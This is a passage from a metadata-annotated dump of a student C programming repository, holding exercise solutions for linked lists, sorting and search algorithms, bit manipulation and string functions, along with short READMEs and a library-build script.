argv[2];\n\n\tif (*op != '+' && *op != '-' && *op != '*' && *op != '/' && *op != '%')\n\t{\n\t\tprintf(\"Error\\n\");\n\t\texit(99);\n\t}\n\n\tif (op[1] == '\\0')\n\t{\n\t\tcalc = (*get_op_func(op))(num1, num2);\n\t\tprintf(\"%d\\n\", calc);\n\t}\n\telse\n\t{\n\t\tprintf(\"Error\\n\");\n\t\texit(99);\n\t}\n\treturn (0);\n}\n" }, { "alpha_fraction": 0.7400000095367432, "alphanum_fraction": 0.7400000095367432, "avg_line_length": 7.333333492279053, "blob_id": "027e94594fa7bb77f78d1f1a747ac1d2c6075896", "content_id": "1b860a2fe0334b8226eb521e466064d96a380b61", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 50, "license_type": "no_license", "max_line_length": 19, "num_lines": 6, "path": "/0x0D-preprocessor/holberton.h", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#ifndef HOLBERTON_H\n#define HOLBERTON_H\n\n\n\n#endif\n" }, { "alpha_fraction": 0.5907372236251831, "alphanum_fraction": 0.5926275849342346, "avg_line_length": 20.59183692932129, "blob_id": "7056754d2da39a5341a405bbb5d0c2a7f6a50400", "content_id": "2087d3843f0b78358f5183d483479b610b5c8aa9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 1058, "license_type": "no_license", "max_line_length": 77, "num_lines": 49, "path": "/0x17-doubly_linked_lists/7-insert_dnodeint.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"lists.h\"\n\n/**\n * insert_dnodeint_at_index - inserts a new node at a given position.\n * @h: pointer to first node.\n * @idx: given node index.\n * @n: data to store in the new node.\n * Return: return the address of the new node, or NULL if it failed or\n * if it is not possible to add the new node at index idx.\n */\ndlistint_t *insert_dnodeint_at_index(dlistint_t **h, unsigned int idx, int n)\n{\n\tdlistint_t *new;\n\tdlistint_t *cursor;\n\tunsigned int i;\n\n\tif (h == NULL)\n\t\treturn (NULL);\n\tcursor = *h;\n\tif (idx == 0)\n\t{\n\t\tnew = add_dnodeint(h, n);\n\t\treturn (new);\n\t}\n\tif (cursor != NULL)\n\t\twhile (cursor->prev != NULL)\n\t\t\tcursor = cursor->prev;\n\tfor (i = 1; cursor != NULL; i++, cursor = cursor->next)\n\t{\n\t\tif (i == idx)\n\t\t{\n\t\t\tif (cursor->next == NULL)\n\t\t\t{\n\t\t\t\tnew = add_dnodeint_end(h, n);\n\t\t\t\treturn (new);\n\t\t\t}\n\t\t\tnew = malloc(sizeof(dlistint_t));\n\t\t\tif (new == NULL)\n\t\t\t\treturn (NULL);\n\t\t\tnew->n = n;\n\t\t\tnew->next = cursor->next;\n\t\t\tnew->prev = cursor;\n\t\t\tcursor->next->prev = new;\n\t\t\tcursor->next = new;\n\t\t\treturn (new);\n\t\t}\n\t}\n\treturn (NULL);\n}\n" }, { "alpha_fraction": 0.62992924451828, "alphanum_fraction": 0.634479284286499, "avg_line_length": 26.47222137451172, "blob_id": "aac95d885371049e397323f4d25337b238630dd8", "content_id": "c58f95ca4b2cab2ebbc23f7a59c8e72a625442af", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 1978, "license_type": "no_license", "max_line_length": 74, "num_lines": 72, "path": "/0x1E-search_algorithms/100-jump.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"search_algos.h\"\n#include <math.h>\n\n/**\n * linear_mod - function that searches for a value in an array of integers\n * using the Linear search algorithm\n * @array: a pointer to the first element of the array to search in\n * @start: initial index\n * @end: final index\n * @value: is the value to search for\n * Return: return the first index where value is located, If value is not\n * present in array or if array is NULL, your function must return -1\n */\n\nint linear_mod(int *array, size_t start, size_t end, int value)\n{\n\tsize_t i;\n\n\tif (array == NULL)\n\t\treturn (-1);\n\n\tfor (i = start; i <= end; i++)\n\t{\n\t\tprintf(\"Value checked array[%d] = [%d]\\n\", (int) i, array[i]);\n\t\tif (array[i] == value)\n\t\t\treturn ((int) i);\n\t}\n\treturn (-1);\n}\n\n/**\n * jump_search - function that searches for a value in a sorted array of\n * integers using the Jump search algorithm\n * @array: a pointer to the first element of the array to search in\n * @size: the number of elements in array\n * @value: is the value to search for\n * Return: return the first index where value is located, If value is not\n * present in array or if array is NULL, your function must return -1\n */\nint jump_search(int *array, size_t size, int value)\n{\n\tsize_t start, end, block_s;\n\n\tblock_s = sqrt(size);\n\n\tif (array == NULL)\n\t\treturn (-1);\n\n\tfor (start = 0, end = block_s; end < size; end += block_s)\n\t{\n\t\tstart = end - block_s;\n\n\t\tprintf(\"Value checked array[%d] = [%d]\\n\", (int) start, array[start]);\n\t\tif (array[start] > value && start == 0)\n\t\t\treturn (-1);\n\t\telse if (array[end] >= value)\n\t\t\tbreak;\n\t}\n\n\tif (end >= size)\n\t{\n\t\tstart = end - block_s;\n\t\tprintf(\"Value checked array[%d] = [%d]\\n\", (int) start, array[start]);\n\t\tprintf(\"Value found between indexes [%d] and [%d]\\n\", (int) start,\n\t\t (int) (end));\n\t\treturn (linear_mod(array, start, size - 1, value));\n\t}\n\n\tprintf(\"Value found between indexes [%d] and [%d]\\n\", (int) start,\n\t (int) (end));\n\treturn (linear_mod(array, start, end, value));\n}\n" }, { "alpha_fraction": 0.6666666865348816, "alphanum_fraction": 0.6666666865348816, "avg_line_length": 15.5, "blob_id": "44094055917dada6e9d98a140a90cac54808daaf", "content_id": "66f8169548e2d8c03738f32c15b20e63629920bd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 99, "license_type": "no_license", "max_line_length": 29, "num_lines": 6, "path": "/0x0D-preprocessor/4-sum.h", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#ifndef FUNCTION_LIKE_MACRO_H\n#define FUNCTION_LIKE_MACRO_H\n\n#define SUM(x, y) ((x) + (y))\n\n#endif\n" }, { "alpha_fraction": 0.5485714077949524, "alphanum_fraction": 0.5571428537368774, "avg_line_length": 14.217391014099121, "blob_id": "c94ffe2e64e8ff8af3a545e0a0b4078ab8f593fa", "content_id": "86361134273342554e1425e4e8791b50dcbf3158", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 350, "license_type": "no_license", "max_line_length": 53, "num_lines": 23, "path": "/0x05-pointers_arrays_strings/9-strcpy.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"holberton.h\"\n\n/**\n * _strcpy - function that copies the string pointed.\n * @dest: pointed destiny.\n * @src: input string.\n * Return: pointer to dest.\n */\nchar *_strcpy(char *dest, char *src)\n{\n\tchar *ini_s = dest;\n\n\twhile (*src != '\\0')\n\t{\n\t\t*dest = *src;\n\t\tdest++;\n\t\tsrc++;\n\t}\n\n\t/* add '\\0' at the end */\n\t*dest = '\\0';\n\treturn (ini_s);\n}\n" }, { "alpha_fraction": 0.5932203531265259, "alphanum_fraction": 0.5932203531265259, "avg_line_length": 28.5, "blob_id": "4ac87e69d0ef80113abfdaa1be5615fe4e097675", "content_id": "3cb67eb23af8255a51aedc953bee2c318e67410d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 59, "license_type": "no_license", "max_line_length": 46, "num_lines": 2, "path": "/0x18-dynamic_libraries/1-create_dynamic_lib.sh", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#!/bin/bash\ngcc -fPIC -c *c ; gcc -shared -o liball.so *.o\n" }, { "alpha_fraction": 0.5117647051811218, "alphanum_fraction": 0.5411764979362488, "avg_line_length": 12.600000381469727, "blob_id": "f01f1a3436d1baee3e6aadb55ac1c35652a00a5e", "content_id": "a1b2d82efa97a7f49dbda9ac64143c125b684486", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 340, "license_type": "no_license", "max_line_length": 59, "num_lines": 25, "path": "/0x02-functions_nested_loops/5-sign.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"holberton.h\"\n/**\n * print_sign - Verify sign of variable.\n * @n: variable for input value.\n * Return: 1 when positive, 0 when 0, and -1 when negative.\n */\n\nint print_sign(int n)\n{\n\tif (n > 0)\n\t{\n\t\t_putchar('+');\n\t\treturn (1);\n\t}\n\telse if (n == 0)\n\t{\n\t\t_putchar('0');\n\t\treturn (0);\n\t}\n\telse\n\t{\n\t\t_putchar('-');\n\t\treturn (-1);\n\t}\n}\n" }, { "alpha_fraction": 0.7898832559585571, "alphanum_fraction": 0.7898832559585571, "avg_line_length": 31.125, "blob_id": "627e723a7c8c599780c509133511f423cf90c1a5", "content_id": "e9aaa42c4ab62d1ad6d8cae6a067e53b99811e09", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 257, "license_type": "no_license", "max_line_length": 73, "num_lines": 8, "path": "/0x17-doubly_linked_lists/README.md", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "### C - Doubly linked lists\n\nthis repository is for learning pourpuses in holbertonschool\n\nGeneral Learning Objectives\n- What is a doubly linked list\n- How to use doubly linked lists\n- Start to look for the right source of information without too much help\n" }, { "alpha_fraction": 0.4982698857784271, "alphanum_fraction": 0.512110710144043, "avg_line_length": 12.136363983154297, "blob_id": "100c9c7420442958db6f7f979732faba8148458e", "content_id": "3aa8e962c11463de15edd38eb065f5922525e177", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 289, "license_type": "no_license", "max_line_length": 49, "num_lines": 22, "path": "/0x05-pointers_arrays_strings/4-print_rev.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"holberton.h\"\n/**\n * print_rev - print the given string in reverse.\n * @s: input string.\n *\n */\nvoid print_rev(char *s)\n{\n\tint leng = 0;\n\n\twhile (*(s + leng) != '\\0')\n\t{\n\t\tleng++;\n\t}\n\tleng = leng - 1;\n\twhile (leng >= 0)\n\t{\n\t\t_putchar(*(s + leng));\n\t\tleng--;\n\t}\n\t_putchar('\\n');\n}\n" }, { "alpha_fraction": 0.6055936217308044, "alphanum_fraction": 0.6073059439659119, "avg_line_length": 18.25274658203125, "blob_id": "bfcdfbf83c382a08f1445c22c0c7af42c772fb2b", "content_id": "50dc03982fa95b585c8d705a9a0fa8ed0b3fe3a1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 1752, "license_type": "no_license", "max_line_length": 71, "num_lines": 91, "path": "/0x1B-sorting_algorithms/101-cocktail_sort_list.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"sort.h\"\n\n/**\n * swap_backward - swap next node and actuall\n * @cursor: current node position\n * @list: list to sort\n */\nvoid swap_backward(listint_t **cursor, listint_t **list)\n{\n\tlistint_t *current, *next, *prev, *p_p;\n\n\tcurrent = *cursor;\n\tprev = current->prev;\n\tnext = current->next;\n\tp_p = prev->prev;\n\tcurrent->next = prev;\n\tcurrent->prev = p_p;\n\n\tprev->next = next;\n\tnext->prev = prev;\n\tprev->prev = current;\n\tif (p_p)\n\t\tp_p->next = current;\n\tif (current->prev == NULL)\n\t\t*list = current;\n\tcurrent = current->next;\n\tprint_list(*list);\n\t*cursor = current;\n}\n\n/**\n * swap_forward - swap next node and actuall\n * @cursor: current node position\n * @list: list to sort\n */\nvoid swap_forward(listint_t **cursor, listint_t **list)\n{\n\tlistint_t *current, *next, *prev, *n_n;\n\n\tcurrent = *cursor;\n\tnext = current->next;\n\tprev = current->prev;\n\tn_n = next->next;\n\tcurrent->next = n_n;\n\tcurrent->prev = next;\n\tif (prev)\n\t\tprev->next = next;\n\tnext->prev = prev;\n\tnext->next = current;\n\tif (n_n)\n\t\tn_n->prev = current;\n\tcurrent = current->prev;\n\tif (current->prev == NULL)\n\t\t*list = current;\n\tprint_list(*list);\n\t*cursor = current;\n}\n\n/**\n * cocktail_sort_list - function that sorts a linked list using coctail\n * @list: pointer to first node in linked list\n */\nvoid cocktail_sort_list(listint_t **list)\n{\n\tlistint_t *cursor;\n\tint cont = 1;\n\n\tif (list == NULL || *list == NULL)\n\t\treturn;\n\n\twhile (cont != 0)\n\t{\n\t\tcont = 0;\n\t\tfor (cursor = *list; cursor->next != NULL; cursor = cursor->next)\n\t\t{\n\t\t\tif (cursor->n > cursor->next->n)\n\t\t\t{\n\t\t\t\tswap_forward(&cursor, list);\n\t\t\t\tcont++;\n\t\t\t}\n\t\t}\n\t\tfor (; cursor->prev != NULL; cursor = cursor->prev)\n\t\t{\n\t\t\tif (cursor->n < cursor->prev->n)\n\t\t\t{\n\t\t\t\tswap_backward(&cursor, list);\n\t\t\t\tcont++;\n\t\t\t}\n\t\t}\n\t}\n}\n" }, { "alpha_fraction": 0.3733333349227905, "alphanum_fraction": 0.4457142949104309, "avg_line_length": 18.44444465637207, "blob_id": "98a1e5a9f10372930859db85d986c9d778c52073", "content_id": "f6769be2ae4c248b0b804e5a43d863c10a0d05d7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 525, "license_type": "no_license", "max_line_length": 71, "num_lines": 27, "path": "/0x06-pointers_arrays_strings/6-cap_string.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"holberton.h\"\n/**\n * cap_string - print the given string in reverse.\n * @s: given string.\n * Return: the string in upper.\n */\nchar *cap_string(char *s)\n{\n\tint iter, i;\n\tint a[] = {32, 9, 10, 44, 59, 46, 33, 63, 34, 40, 41, 123, 125};\n\n\tfor (iter = 0; s[iter] != '\\0'; iter++)\n\t{\n\t\tfor (i = 0; i < 13; i++)\n\t\t{\n\t\t\tif ((s[iter] == a[i]) && (s[iter + 1] >= 'a' && s[iter + 1] <= 'z'))\n\t\t\t\ts[iter + 1] += 'A' - 'a';\n\t\t\telse\n\t\t\t\tcontinue;\n\t\t}\n\t}\n\tif (s[0] >= 'a' && s[0] <= 'z')\n\t{\n\t\ts[0] += 'A' - 'a';\n\t}\n\treturn (s);\n}\n" }, { "alpha_fraction": 0.7676767706871033, "alphanum_fraction": 0.7676767706871033, "avg_line_length": 36.125, "blob_id": "840e65b6e0eeaa3506471f2edfbb38c185a444f9", "content_id": "94640dc430ece27944cfe171f256d38a4d14940b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 297, "license_type": "no_license", "max_line_length": 85, "num_lines": 8, "path": "/0x1B-sorting_algorithms/README.md", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "### C - Sorting algorithms & Big O\n\n## General Learning Objectives\n\n- At least four different sorting algorithms\n- What is the Big O notation, and how to evaluate the time complexity of an algorithm\n- How to select the best sorting algorithm for a given input\n- What is a stable sorting algorithm\n" }, { "alpha_fraction": 0.6068702340126038, "alphanum_fraction": 0.6125954389572144, "avg_line_length": 19.959999084472656, "blob_id": "58bb5d5465745e48e017a9e2a967a91eeada5aa1", "content_id": "3856656b26ef5730bf1a93053b43b7aa368d9573", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 524, "license_type": "no_license", "max_line_length": 61, "num_lines": 25, "path": "/0x08-recursion/5-sqrt_recursion.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"holberton.h\"\n/**\n * calc_sqrt - returns the factorial of a given number.\n * @n: input value.\n * @y: number calc.\n * Return: returns the natural square root of a number.\n */\nint calc_sqrt(int n, int y)\n{\n\tif ((y * y) == n)\n\t\treturn (y);\n\telse if ((y * y) > n)\n\t\treturn (-1);\n\treturn (calc_sqrt(n, (y + 1)));\n}\n\n/**\n * _sqrt_recursion - returns the factorial of a given number.\n * @n: input value.\n * Return: returns the natural square root of a number.\n */\nint _sqrt_recursion(int n)\n{\n\treturn (calc_sqrt(n, 0));\n}\n" }, { "alpha_fraction": 0.4537205100059509, "alphanum_fraction": 0.4718693196773529, "avg_line_length": 16.774192810058594, "blob_id": "b512c37d03e37aa91c0088b90262918b9e690ee0", "content_id": "61d595a6e4d76e5768bcb585e05cf8a075c9220c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 551, "license_type": "no_license", "max_line_length": 68, "num_lines": 31, "path": "/0x1B-sorting_algorithms/100-shell_sort.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"sort.h\"\n/**\n * shell_sort - sort the array using shell method and knuth sequence\n * @array: array to sort\n * @size: size of array\n */\nvoid shell_sort(int *array, size_t size)\n{\n\tint h = 1, i, j;\n\tint aux = 0;\n\n\twhile (h < ((int)(size)))\n\t{\n\t\th = (3 * h) + 1;\n\t}\n\th = (h - 1) / 3;\n\twhile (h > 0)\n\t{\n\t\tfor (i = h; i < (int)(size); i++)\n\t\t{\n\t\t\tfor (j = i; (j - h) >= 0 && array[j] < array[j - h]; j -= h)\n\t\t\t{\n\t\t\t\taux = array[j];\n\t\t\t\tarray[j] = array[j - h];\n\t\t\t\tarray[j - h] = aux;\n\t\t\t}\n\t\t}\n\t\tprint_array(array, size);\n\t\th = (h - 1) / 3;\n\t}\n}\n" }, { "alpha_fraction": 0.4957983195781708, "alphanum_fraction": 0.5258103013038635, "avg_line_length": 15.019230842590332, "blob_id": "f0852b84c25c52fcab8a853542024cf3ab03dedf", "content_id": "dd6da071313124b169a15d4117d76b79c66de674", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 833, "license_type": "no_license", "max_line_length": 79, "num_lines": 52, "path": "/0x14-bit_manipulation/5-flip_bits.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"holberton.h\"\n\n/**\n * flip_bits - get number of bits you would need to flip to get from one number\n * to another.\n * @n: given number 1\n * @m: given number 2.\n * Return: number of bits needed.\n */\nunsigned int flip_bits(unsigned long int n, unsigned long int m)\n{\n\tint i, index, size, res;\n\tunsigned long int small, big, a, p, num1, num2;\n\n\tsize = sizeof(unsigned long int) * 8;\n\ta = 1;\n\tif (n < m)\n\t{\n\t\tsmall = n;\n\t\tbig = m;\n\t}\n\telse\n\t{\n\t\tsmall = m;\n\t\tbig = n;\n\t}\n\n\tfor (i = 0; i < size; i++)\n\t{\n\t\tp = (a << ((size - 1) - i) & big);\n\t\tif (p)\n\t\t{\n\t\t\tindex = (size - 1) - i;\n\t\t\tbreak;\n\t\t}\n\t}\n\tfor (res = 0; index >= 0; index--)\n\t{\n\t\tnum1 = (a << index) & big;\n\t\tnum2 = (a << index) & small;\n\t\tif (num1)\n\t\t\tnum1 = 1;\n\t\telse\n\t\t\tnum1 = 0;\n\t\tif (num2)\n\t\t\tnum2 = 1;\n\t\telse\n\t\t\tnum2 = 0;\n\t\tres += (num1 ^ num2);\n\t}\n\treturn (res);\n}\n" }, { "alpha_fraction": 0.6034063100814819, "alphanum_fraction": 0.6180048584938049, "avg_line_length": 16.869565963745117, "blob_id": "33e7538c6304f9a4358f9a6b34244a8f87f34c43", "content_id": "a8cb53bac3db7d9ba7e92e21d90b5faaecfbaffd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 411, "license_type": "no_license", "max_line_length": 58, "num_lines": 23, "path": "/0x14-bit_manipulation/2-get_bit.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"holberton.h\"\n\n/**\n * get_bit - prints the binary representation of a number.\n * @n: given number.\n * @index: binary index.\n * Return: 1 if worked.\n */\nint get_bit(unsigned long int n, unsigned int index)\n{\n\tint a = 1;\n\tunsigned int size;\n\tunsigned long int p;\n\n\tsize = sizeof(unsigned long int) * 8;\n\tif (index > size)\n\t\treturn (-1);\n\tp = (a << index & n);\n\tif (p)\n\t\treturn (1);\n\telse\n\t\treturn (0);\n}\n" }, { "alpha_fraction": 0.4131944477558136, "alphanum_fraction": 0.5104166865348816, "avg_line_length": 10.520000457763672, "blob_id": "fc76542611b9cd4ef407bc557306c7016e6716a6", "content_id": "133cf30a618b8c2237ac935f99e7d77f8a897691", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 288, "license_type": "no_license", "max_line_length": 58, "num_lines": 25, "path": "/0x04-more_functions_nested_loops/100-prime_factor.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include <stdio.h>\n/**\n * main - Prints the largest prime number of 612852475143.\n *\n * Return: always 0.\n */\n\n\nint main(void)\n{\n\tlong int num, i;\n\n\tnum = 612852475143;\n\n\tfor (i = 2; i < num; i++)\n\t{\n\t\tif (num % i == 0)\n\t\t{\n\t\t\tnum /= i;\n\t\t\ti--;\n\t\t}\n\t}\n\tprintf(\"%ld\\n\", i);\n\treturn (0);\n}\n" }, { "alpha_fraction": 0.6247654557228088, "alphanum_fraction": 0.6303939819335938, "avg_line_length": 19.5, "blob_id": "77bad32830a5b0b1242dc90a4fa6a79076f5fc19", "content_id": "b6a7630dd52c2ed19f585e199b85421bd0b1a248", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 1599, "license_type": "no_license", "max_line_length": 78, "num_lines": 78, "path": "/0x1B-sorting_algorithms/3-quick_sort.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"sort.h\"\n\n/**\n * swap - change position between two position of an array and print the array\n * @array: array to sort\n * @first: lowest position\n * @last: highest position\n * @size: size of array\n */\nvoid swap(int *array, int first, int last, size_t size)\n{\n\tint aux, value;\n\n\tvalue = array[first];\n\taux = array[last];\n\tarray[last] = value;\n\tarray[first] = aux;\n\tprint_array(array, size);\n}\n/**\n * part - fin the partition position or pivot of the array\n * @array: array to sort\n * @first: lowest position\n * @last: highest position\n * @size: size of array\n * Return: pivot index\n */\nint part(int *array, int first, int last, size_t size)\n{\n\tint pivot = array[last];\n\tint i = first - 1;\n\tint j;\n\n\tfor (j = first; j <= last - 1; j++)\n\t{\n\t\tif (array[j] < pivot)\n\t\t{\n\t\t\ti++;\n\t\t\tif (i < j)\n\t\t\t\tswap(array, i, j, size);\n\t\t}\n\t}\n\tif (array[i + 1] > array[last])\n\t\tswap(array, i + 1, last, size);\n\treturn (i + 1);\n}\n\n/**\n * sorting - sorts an array of integers in ascending order\n * @array: array to sort\n * @first: lowest position\n * @last: highest position\n * @size: size of array\n */\nvoid sorting(int *array, int first, int last, size_t size)\n{\n\tint pivot;\n\n\tif (first < last)\n\t{\n\t\tpivot = part(array, first, last, size);\n\t\tsorting(array, first, pivot - 1, size);\n\t\tsorting(array, pivot + 1, last, size);\n\t}\n}\n\n/**\n * quick_sort - sorts an array of integers in ascending order using the Quick\n * sort algorithm using Lomuto partition scheme\n * @array: array to sort\n * @size: size of array\n */\nvoid quick_sort(int *array, size_t size)\n{\n\tint last = size - 1;\n\n\tsorting(array, 0, last, size);\n}\n" }, { "alpha_fraction": 0.8604651093482971, "alphanum_fraction": 0.8604651093482971, "avg_line_length": 86, "blob_id": "bce74bf2117c2d8131d720258f1cb7539e6d549d", "content_id": "fce5dafaef6d940b21fcaaafbdf97023c3a29deb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 86, "license_type": "no_license", "max_line_length": 86, "num_lines": 1, "path": "/0x08-recursion/README.md", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "This repository is about recursion, different functions and projects using recursions." }, { "alpha_fraction": 0.5960590839385986, "alphanum_fraction": 0.5985221862792969, "avg_line_length": 17.454545974731445, "blob_id": "08d3b05fc8ae6f85d710a0e74e44c37634447489", "content_id": "b5a134f307a59b06f957a533a339fcbd95a4f87d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 406, "license_type": "no_license", "max_line_length": 52, "num_lines": 22, "path": "/0x07-pointers_arrays_strings/1-memcpy.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"holberton.h\"\n/**\n * _memcpy - copies memory area.\n * @dest: input direction in string.\n * @src: direction to be changed.\n * @n: staring point.\n * Return: pointer to object.\n */\nchar *_memcpy(char *dest, char *src, unsigned int n)\n{\n\tchar *dest_aux = dest;\n\tchar *src_aux = src;\n\tunsigned int i;\n\n\tfor (i = 0; i < n; i++)\n\t{\n\t\t*dest_aux = *src_aux;\n\t\tdest_aux++;\n\t\tsrc_aux++;\n\t}\n\treturn (dest);\n}\n" }, { "alpha_fraction": 0.5819520950317383, "alphanum_fraction": 0.591160237789154, "avg_line_length": 21.625, "blob_id": "5c4385fcb45e555b85e5e9629df65be9576023dd", "content_id": "f64ded7d75757f0760cb2742326f3352cd9791cb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 543, "license_type": "no_license", "max_line_length": 64, "num_lines": 24, "path": "/0x06-pointers_arrays_strings/2-strncpy.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"holberton.h\"\n\n/**\n * _strncpy - concatenate two strings\n * @dest: the string where we want to append.\n * @src: the string from which n characters are going to append.\n * @n: maximum number of character to be appended.\n * Return: pointer to the dest string.\n */\nchar *_strncpy(char *dest, char *src, int n)\n{\n\tint iter_n = 0;\n\n\tfor (iter_n = 0; iter_n < n && src[iter_n] != '\\0'; iter_n++)\n\t{\n\t\tdest[iter_n] = src[iter_n];\n\t}\n\tfor (; iter_n < n; iter_n++)\n\t{\n\t\tdest[iter_n] = '\\0';\n\t}\n\t/* add '\\0' at the end */\n\treturn (&(*dest));\n}\n" }, { "alpha_fraction": 0.4521739184856415, "alphanum_fraction": 0.469565212726593, "avg_line_length": 13.838709831237793, "blob_id": "e545c91aae042f803d049474b618bbd03638dd1d", "content_id": "5177c72b98f7a933fa54f1f9fb67b22d13f22e02", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 460, "license_type": "no_license", "max_line_length": 60, "num_lines": 31, "path": "/0x04-more_functions_nested_loops/10-print_triangle.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"holberton.h\"\n/**\n * print_triangle - Prints a triangle from the size value.\n * @size: is the size of the triangle, defined the by input.\n */\n\nvoid print_triangle(int size)\n{\n\tchar a = 35, x, y, z, w;\n\n\tif (size > 0)\n\t{\n\t\tfor (y = size; y > 0; y--)\n\t\t{\n\t\t\tfor (x = 0; x < (y - 1); x++)\n\t\t\t{\n\t\t\t\t_putchar(' ');\n\t\t\t}\n\t\t\tw = size - x;\n\t\t\tfor (z = 0; z <= (w - 1); z++)\n\t\t\t{\n\t\t\t\t_putchar(a);\n\t\t\t}\n\t\t\t_putchar('\\n');\n\t\t}\n\t}\n\telse\n\t{\n\t\t_putchar('\\n');\n\t}\n}\n" }, { "alpha_fraction": 0.6280701756477356, "alphanum_fraction": 0.6315789222717285, "avg_line_length": 19.35714340209961, "blob_id": "257620b9415ec80baa8988851ae650ed4356db8b", "content_id": "979cc46083994110d77ad88bafaccfea6fc6e248", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 285, "license_type": "no_license", "max_line_length": 77, "num_lines": 14, "path": "/0x17-doubly_linked_lists/1-dlistint_len.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"lists.h\"\n/**\n * dlistint_len - returns the number of elements in a linked dlistint_t list.\n * @h: given list.\n * Return: number of nodes.\n */\nsize_t dlistint_len(const dlistint_t *h)\n{\n\tint elements = 0;\n\n\tfor (; h != NULL; h = h->next, elements++)\n\t\t;\n\treturn (elements);\n}\n" }, { "alpha_fraction": 0.6707317233085632, "alphanum_fraction": 0.6975609660148621, "avg_line_length": 17.68181800842285, "blob_id": "2dac9bb36d4cd3ee2ee94bdec4623f3492c3d429", "content_id": "797c575d280352bf589e0ce2d712c7d6aef94920", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 410, "license_type": "no_license", "max_line_length": 75, "num_lines": 22, "path": "/0x12-singly_linked_lists/README.md", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "### Singly linked lists\n\nThis repository contain the files for the project about singly linked lists\n\n### General learning objectives\n- When and why using linked lists vs arrays\n- How to build and use linked lists\n\n### files\n- 0-print_list.c<br>\n- 1-list_len.c<br>\n- 2-add_node.c<br>\n- 3-add_node_end.c<br>\n- 4-free_list.c<br>\n- 100-first.c<br>\n- 101-hello_holberton.asm<br>\n- lists.h\n\n###AUTHOR\nDavid Peralta\n\nHOLBERTON SCHOOL" }, { "alpha_fraction": 0.48932039737701416, "alphanum_fraction": 0.5126213431358337, "avg_line_length": 15.09375, "blob_id": "ecfeda5c2c639c1e7d62495dd762bf01ae9dad38", "content_id": "19ea97ece3a6586253461a3c8ece1399824ad6cf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 515, "license_type": "no_license", "max_line_length": 63, "num_lines": 32, "path": "/0x14-bit_manipulation/1-print_binary.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"holberton.h\"\n\n/**\n * print_binary - prints the binary representation of a number.\n * @n: given number.\n */\nvoid print_binary(unsigned long int n)\n{\n\tint flag = 0;\n\tunsigned long int a = 1;\n\tint b, i;\n\tint size;\n\tunsigned long int p;\n\n\tif (n == 0)\n\t{\n\t\t_putchar('0');\n\t\treturn;\n\t}\n\tsize = sizeof(unsigned long int) * 8;\n\tfor (i = 0; i < 